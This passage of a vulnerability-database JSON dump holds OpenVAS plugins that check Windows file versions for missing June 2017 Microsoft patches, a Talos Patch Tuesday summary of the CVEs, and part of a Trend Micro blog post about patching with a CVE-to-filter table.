Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022724\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22168\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22168\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:42:44", "description": "This host is missing a critical security\n update according to Microsoft KB4022726", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022726)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", 
"CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811154", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022726)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811154\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8476\",\n \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\",\n \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\",\n \"CVE-2017-8460\", \"CVE-2017-8493\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8469\", \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\",\n \"CVE-2017-8522\", \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\",\n \"CVE-2017-8468\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98852, 98902, 98853, 98933, 98949, 98885, 98903, 98854,\n 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914,\n 98922, 98857, 98862, 98824, 98923, 98929, 98858, 98859, 98826,\n 98932, 98835, 98836, 98847, 98860, 98940, 98837, 98839, 98864,\n 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98887, 98850,\n 98900, 98818, 98842, 
98848, 98849, 98899, 98926, 98930, 98843,\n 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 12:08:00 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022726)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022726\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in importing printer drivers and get errors with error code\n 0x80070bcb.\n\n - The mouse input can cease to function. The mouse pointer may continue\n to move, but movements and clicks produce no response other than a\n beeping noise.\n\n - An error in printing a document using a 32-bit application can crash a\n Print Server in a call to nt!MiGetVadWakeList.\n\n - An error in unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor or\n Windows Server 2012 R2 systems using Xeon E3V6 processor.\n\n - Multiple issue in Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe, Microsoft Scripting Engine,\n Windows COM, and Windows Kernel-Mode Drivers. 
For more information about the\n security vulnerabilities resolved, please refer to the Security Update Guide.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to gain\n the same user rights as the current user and to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022726\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.9600.18722\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.9600.18722\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "description": "Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. 
This month's release addresses 92 vulnerabilities with 17 of them rated critical and 75 rated important. Impacted products include Edge, Internet Explorer, Office, SharePoint, Skype for Business, Lync, and Windows.<br /><br /><a name='more'></a><br /><h3 id=\"h.hv5a65yfsbxp\">Vulnerabilities Rated Critical</h3><h4 id=\"h.wfa2xeyn8j0o\">CVE-2017-0283</h4>This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. The attack can result in the attacker gaining full control of the affected system. This can be exploited through multiple vectors including viewing a specially crafted website or a user opening a specially crafted document file.<br /><h4 id=\"h.pd0tltwr72p2\">CVE-2017-0291 / CVE-2017-0292</h4>These are remote code execution vulnerabilities in Microsoft Windows, triggered if a user opens a specially crafted PDF file. The attack results in potential arbitrary code execution in the context of the current user and can be exploited by having the user open a specially crafted PDF file.<br /><h4 id=\"h.hv36855sqvlr\">CVE-2017-0294</h4>This is a remote code execution vulnerability in Microsoft Windows related to the failure to properly handle cabinet files. This is exploitable by an attacker having a user open a specially crafted cabinet file or spoofing a network printer and tricking the user into installing a malicious cabinet file disguised as a printer driver.<br /><h4 id=\"h.diewipjyn91o\">CVE-2017-8464</h4>This is a remote code execution vulnerability related to the way that Windows Explorer handles LNK files. This vulnerability can be triggered if the icon of a specially crafted shortcut is displayed.<br /><h4 id=\"h.wbb780pr8m8i\">CVE-2017-8496 / CVE-2017-8497</h4>These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. The resulting memory corruption can result in arbitrary code execution. 
These can be exploited by a user visiting a specially crafted website.<br /><h4 id=\"h.1z06wiwr79tf\">CVE-2017-8499</h4>This is a remote code execution vulnerability in the Microsoft Edge JavaScript scripting engine related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website.<br /><h4 id=\"h.i1b4odd02i18\">CVE-2017-8517</h4>This is a remote code execution vulnerability in the JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website resulting in the attacker taking full control of the affected system.<br /><h4 id=\"h.3l2zoggepikn\">CVE-2017-8520</h4>This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.hirfaaudj8y2\">CVE-2017-8522</h4>This is a remote code execution vulnerability in the way the JavaScript engines render content when handling objects in memory in Microsoft browsers including both Internet Explorer and Edge. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.xpxmg2ydkif2\">CVE-2017-8524</h4>This is a remote code execution vulnerability in the JavaScript engines in Microsoft Browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.<br /><h4 id=\"h.j0uggxwjmgay\">CVE-2017-8527</h4>This is a remote code execution vulnerability in the Windows font library related to improper handling of specially crafted embedded fonts. 
There are multiple ways this vulnerability can be exploited including viewing a specially crafted website and opening a specially crafted document.<br /><h4 id=\"h.a2u2lz7ol3bu\">CVE-2017-8528</h4>This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. There are multiple ways this vulnerability can be exploited including viewing a specially crafted website and opening a specially crafted document.<br /><h4 id=\"h.bx2hk4byyp0\">CVE-2017-8543</h4>This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><h4 id=\"h.pdkn0478ls9v\">CVE-2017-8548 / CVE-2017-8549</h4>These are remote code execution vulnerabilities in the JavaScript engines of Microsoft Browsers related to improper handling of objects in memory. This can be exploited by having a user view a specially crafted website.<br /><h3 id=\"h.gpoya8yq4g7y\">Vulnerabilities Rated as Important</h3><h4 id=\"h.2bzwegrsdvuh\">CVE-2017-0173 / CVE-2017-0215 / CVE-2017-0216 / CVE-2017-0218 / CVE-2017-0219</h4>These are security feature bypass vulnerabilities in Device Guard that could allow the attacker to inject malicious code into a Windows PowerShell session. This can be exploited by an attacker with access to a local machine by injecting malicious code into a script that is trusted by the Code Integrity policy.<br /><h4 id=\"h.fbwxsdtpm92q\">CVE-2017-0193</h4>This is a privilege escalation vulnerability in Windows Hyper-V instruction emulation related to improper privilege level enforcement. 
This vulnerability could be combined with another vulnerability to take advantage of the elevated privileges while running.<br /><h4 id=\"h.e4h7wyh0j9ao\">CVE-2017-0260 / CVE-2017-8506</h4>These are remote code execution vulnerabilities in Microsoft Office related to improper input validation prior to loading dynamic link library (DLL) files. They can be exploited by a user opening a specially crafted office document and can result in the attacker gaining full control of the affected system.<br /><h4 id=\"h.d0s8jre8ln5i\">CVE-2017-0282 / CVE-2017-0284 / CVE-2017-0285</h4>This is an information disclosure vulnerability in Windows Uniscribe related to improper disclosure of the contents of its memory. This can be exploited by having a user open a specially crafted document or visit an untrusted webpage.<br /><h4 id=\"h.bo1p344p5bt2\">CVE-2017-0286 / CVE-2017-0287 / CVE-2017-0288 / CVE-2017-0289</h4>These are information disclosure vulnerabilities in the Windows GDI functionality that results in disclosure of the contents of memory. This can be exploited by a user opening a specially crafted document or convincing a user to access an untrusted webpage.<br /><h4 id=\"h.rc19ikpi9rkx\">CVE-2017-0295</h4>This is a tampering vulnerability in Microsoft Windows that allows an authenticated attacker to modify the C:\\Users\\DEFAULT folder structure. This is exploitable by an authenticated user prior to the target user logging on locally to the computer. Users that have previously logged on to the system are not impacted by this vulnerability.<br /><h4 id=\"h.ukhf4bu3xpr9\">CVE-2017-0296</h4>This is a privilege escalation vulnerability that impacts Windows 10. The vulnerability is a buffer overrun corruption that can result in escalation of privilege. 
This is exploitable by a local attacker executing a specially crafted application to elevate privilege.<br /><h4 id=\"h.9qf2te7i5b1f\">CVE-2017-0297</h4>This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by a local attacker executing a specially crafted application to elevate privilege.<br /><h4 id=\"h.lotk64hjlvjg\">CVE-2017-0298</h4>This is a privilege escalation vulnerability in Windows, specifically when a DCOM object in Helppane.exe that is configured to run as the interactive user fails to properly authenticate a client. Exploitation occurs when an attacker who is logged into the system executes a specially crafted application that would exploit the vulnerability after another user logs on to the same system via Terminal Services or Fast User Switching.<br /><h4 id=\"h.v8sfr1cbca79\">CVE-2017-0299 / CVE-2017-0300 / CVE-2017-8462</h4>These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of a memory address allowing the attacker to retrieve information to potentially bypass Kernel Address Space Layout Randomization (KASLR). The vulnerabilities can be exploited by an attacker that is logged on to the affected system and executes a specially crafted application.<br /><h4 id=\"h.tyo4moefstll\">CVE-2017-8460</h4>This is an information disclosure vulnerability in Microsoft Windows related to a user opening a specially crafted PDF file. This vulnerability can be exploited by an attacker having a user open a specially crafted PDF file.<br /><h4 id=\"h.wflwqpqh38w8\">CVE-2017-8465 / CVE-2017-8466 / CVE-2017-8468</h4>These are use-after-free vulnerabilities that can result in privilege escalation. They are specifically triggered when Windows improperly handles objects in memory. 
These vulnerabilities can be exploited by the attacker logging in locally or convincing a user to execute a specially crafted application.<br /><h4 id=\"h.loqaz6h61hfq\">CVE-2017-8469 / CVE-2017-8470</h4>This is an information disclosure vulnerability related to the way the Windows kernel improperly initializes objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.ahczr2jz5r7j\">CVE-2017-8471 / CVE-2017-8472 / CVE-2017-8473 / CVE-2017-8474 / CVE-2017-8475 / CVE-2017-8476 / CVE-2017-8477 / CVE-2017-8478 / CVE-2017-8479 / CVE-2017-8480 / CVE-2017-8481 / CVE-2017-8482 / CVE-2017-8483 / CVE-2017-8484 / CVE-2017-8485 / CVE-2017-8488 / CVE-2017-8489 / CVE-2017-8490 / CVE-2017-8491 / CVE-2017-8492 / CVE-2017-8553</h4>These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of objects in memory. Exploitation can occur by an authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.r3dx3kkvmfcz\">CVE-2017-8493</h4>This is a security feature bypass vulnerability that exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks. This could result in an attacker being able to set variables that are either read-only or require authentication. This can be exploited by an attacker executing a specially crafted application to bypass UEFI variable security in Windows.<br /><h4 id=\"h.p3llcf1m8rq5\">CVE-2017-8494</h4>This is a privilege escalation vulnerability related to improper object handling in memory in Windows Secure Kernel Mode. This can be exploited by a locally-authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.6462oxbspxq3\">CVE-2017-8507</h4>This is a remote code execution vulnerability in Microsoft Outlook related to parsing of specially crafted email messages. 
This vulnerability is triggered when Microsoft Outlook processes a specially crafted message that allows script execution. This can be exploited by opening a specially crafted email message.<br /><h4 id=\"h.y14yeg9hmtps\">CVE-2017-8508</h4>This is a security feature bypass vulnerability in Microsoft Office related to the improper handling of the parsing of file formats. The vulnerability by itself does not allow arbitrary code execution, but could be used in conjunction with another vulnerability to take advantage of the security feature bypass to execute arbitrary code. This can be exploited by having a user open a specially crafted file.<br /><h4 id=\"h.kqtny2lmhpy4\">CVE-2017-8509 / CVE-2017-8510 / CVE-2017-8511 / CVE-2017-8512 / CVE-2017-8513</h4>These are remote code execution vulnerabilities in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website.<br /><h4 id=\"h.o1ru3izc54qs\">CVE-2017-8514</h4>This is a reflected cross-site scripting vulnerability in Microsoft SharePoint Server related to improper sanitization of specially crafted requests. This can be exploited by sending a specially crafted request to an affected SharePoint server and will run the script in the security context of the current user. The request could be delivered via either an email message or a specially crafted URL on a website.<br /><h4 id=\"h.3mlt339eyw7b\">CVE-2017-8515</h4>This is a denial of service vulnerability in Microsoft Windows that is triggered when an unauthenticated attacker sends a specially crafted kernel mode request. This attack could cause a denial of service on the target system, requiring a reboot to resolve.<br /><h4 id=\"h.z2c1qk9dh3d8\">CVE-2017-8519</h4>This is a remote code execution vulnerability in Internet Explorer related to objects in memory being improperly accessed. 
The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.mv8eybhqa5pd\">CVE-2017-8521</h4>This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.5ffctj19wxm5\">CVE-2017-8523</h4>This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly apply Same Origin Policy for HTML elements present in other browser windows. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.<br /><h4 id=\"h.g14jbgu5zebf\">CVE-2017-8529</h4>This is an information disclosure vulnerability that affects both Internet Explorer and Edge. The vulnerability resides specifically in print preview and can be triggered by browsing to a specially crafted URL.<br /><h4 id=\"h.e6il8xov2qu5\">CVE-2017-8530</h4>This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly enforce Same Origin Policies potentially allowing an attacker to access information from origins outside of the current one. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.<br /><h4 id=\"h.yo9w4ohnsd64\">CVE-2017-8531 / CVE-2017-8532 / CVE-2017-8533</h4>These are information disclosure vulnerabilities in the Windows GDI component related to improper disclosure of the contents of its memory. 
They can be exploited by having a user open a specially crafted document or visit an untrusted webpage.<br /><h4 id=\"h.i2sjbys230jf\">CVE-2017-8534</h4>This is an information disclosure vulnerability in Windows Uniscribe related to the improper disclosure of the contents of its memory. There are multiple ways to exploit this vulnerability including having the user open a specially crafted document or having them visit an untrusted webpage.<br /><h4 id=\"h.1jm00kmnvkvp\">CVE-2017-8544</h4>This is an information disclosure vulnerability in Windows Search related to improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><h4 id=\"h.x5xrllpbrgrq\">CVE-2017-8545</h4>This is a spoofing vulnerability in Microsoft Office for Mac related to a failure to properly sanitize HTML or treat it in a safe manner. This can be exploited by sending an email with specific HTML tags that display a malicious authentication prompt and could provide the attacker a user's authentication information or login credentials.<br /><h4 id=\"h.vm3l0n9yt3yj\">CVE-2017-8547</h4>This is a remote code execution vulnerability in Internet Explorer related to improper access of objects in memory. The vulnerability could result in corrupt memory that can be leveraged to execute arbitrary code. Exploitation can occur by having a user view a specially crafted website.<br /><h4 id=\"h.ifsntniixnev\">CVE-2017-8550</h4>This is a remote code execution vulnerability in Skype for Business and Microsoft Lync Servers related to a failure to properly sanitize specially crafted content. An authenticated attacker could leverage this vulnerability to execute HTML and JavaScript content in the Skype for Business or Lync context including opening a web page using the default browser or opening another messaging session with another user. 
Exploitation would require an attacker to invite a user to an instant message session and then send a message that contains specially crafted JavaScript content.<br /><h4 id=\"h.5idaqenq3iuk\">CVE-2017-8551</h4>This is a privilege escalation vulnerability in SharePoint Server related to the improper sanitization of a specially crafted web request. Successful exploitation could result in cross-site scripting attacks on affected systems and the script running in the security context of the current user. Exploitation occurs by an authenticated attacker sending a specially crafted request to an affected SharePoint Server.<br /><h4 id=\"h.dazxtzgr79i4\">CVE-2017-8555</h4>This is a security feature bypass vulnerability in Microsoft Edge related to improper validation of specially crafted documents in the Edge Content Security Policy. This vulnerability could be leveraged to trick a user into loading a web page with malicious content. Exploitation occurs through a user viewing a specially crafted webpage.<br /><h3 id=\"h.x43pguv8bvah\">Coverage</h3>In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. 
For the most current rule information, please refer to your Management Center or Snort.org.<br /><br />Snort Rules:<br />17042<br />24500<br />43155-43166<br />43169-43176<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=FtF1o6PBkRM:WE1LfzY7Ugo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/FtF1o6PBkRM\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-06-13T13:48:00", "title": "Microsoft Patch Tuesday - June 2017", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0173", "CVE-2017-0193", "CVE-2017-0215", "CVE-2017-0216", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0260", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0286", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0295", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8469", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8472", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8488", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8496", "CVE-2017-8497", "CVE-2017-8499", "CVE-2017-8506", "CVE-2017-8507", "CVE-2017-8508", "CVE-2017-8509", "CVE-2017-8510", "CVE-2017-8511", "CVE-2017-8512", "CVE-2017-8513", "CVE-2017-8514", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8519", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8528", "CVE-2017-8529", 
"CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8534", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8545", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8550", "CVE-2017-8551", "CVE-2017-8553", "CVE-2017-8555"], "modified": "2017-06-13T20:50:20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/FtF1o6PBkRM/ms-tuesday.html", "id": "TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-06-27T11:16:56", "description": "\n\n\u201cWhat can you sit on, sleep on, and brush your teeth with?\u201d This was the question posed to Steve Martin\u2019s character C.D. Bales in the 1987 movie Roxanne. In a modern take of Edmond Rostand's 1897 verse play Cyrano de Bergerac, the movie centers around C.D.\u2019s attempt to win the love of a woman while navigating life with his unusually large nose. When C.D. wonders what the point of the question is, his god sister responds, \u201cThe point is that sometimes the answer is so obvious, you don't even realize it. It's as plain as the nose on your face.\u201d By the way, the answer to the question is so obvious: a chair, a bed, and a toothbrush.\n\nAt the Gartner Security and Risk Summit in Washington, D.C., held earlier this week, I heard a recurring theme across the various sessions I attended. The theme was around the fact that the discipline of patching isn\u2019t where it needs to be. As we witnessed with the recent WannaCry ransomware attack, which utilized vulnerabilities that were disclosed by The Shadow Brokers and subsequently patched by Microsoft, many organizations were still affected because they hadn\u2019t patched their systems. The general guidance given at various sessions: Patch your systems. While the answer is so obvious, it may not be practical for some organizations, especially those with thousands of systems. 
Our solutions can help through the use of \u201cvirtual patching.\u201d While virtual patching is a term that is now pretty common in the security world, where we stand out is when vulnerabilities haven\u2019t been patched by the vendor. If a vulnerability comes to us via the Zero Day Initiative, we will have protection for our customers ahead of a patch that\u2019s made available by the vendor. This is even more important if a vulnerability is brought to us for a solution that is no longer supported by the vendor. Interestingly enough, with this month\u2019s Microsoft Patch Tuesday, Microsoft has issued SMB patches for Windows XP, which reached its end of support deadline in April 2014. While Microsoft states that doing this is an exception and not the norm, it could create a false \u201csafety net\u201d for those who haven\u2019t upgraded their systems. The precedent that this might set in the future is an answer that isn\u2019t so obvious.\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before June 13, 2017. Microsoft released patches for almost 100 new CVEs in Internet Explorer, Edge, Office, Windows, and Skype. A total of 18 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. 
You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [June 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/6/13/the-june-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0173 | | No Vendor Intelligence Provided \nCVE-2017-0193 | | No Vendor Intelligence Provided \nCVE-2017-0215 | 28628 | \nCVE-2017-0216 | | No Vendor Intelligence Provided \nCVE-2017-0218 | | No Vendor Intelligence Provided \nCVE-2017-0219 | | No Vendor Intelligence Provided \nCVE-2017-0260 | | No Vendor Intelligence Provided \nCVE-2017-0282 | | No Vendor Intelligence Provided \nCVE-2017-0283 | | No Vendor Intelligence Provided \nCVE-2017-0284 | | No Vendor Intelligence Provided \nCVE-2017-0285 | | No Vendor Intelligence Provided \nCVE-2017-0286 | | No Vendor Intelligence Provided \nCVE-2017-0287 | | No Vendor Intelligence Provided \nCVE-2017-0288 | | No Vendor Intelligence Provided \nCVE-2017-0289 | | No Vendor Intelligence Provided \nCVE-2017-0291 | | No Vendor Intelligence Provided \nCVE-2017-0292 | | No Vendor Intelligence Provided \nCVE-2017-0294 | | No Vendor Intelligence Provided \nCVE-2017-0295 | | No Vendor Intelligence Provided \nCVE-2017-0296 | | Insufficient Vendor Information \nCVE-2017-0297 | | No Vendor Intelligence Provided \nCVE-2017-0298 | | No Vendor 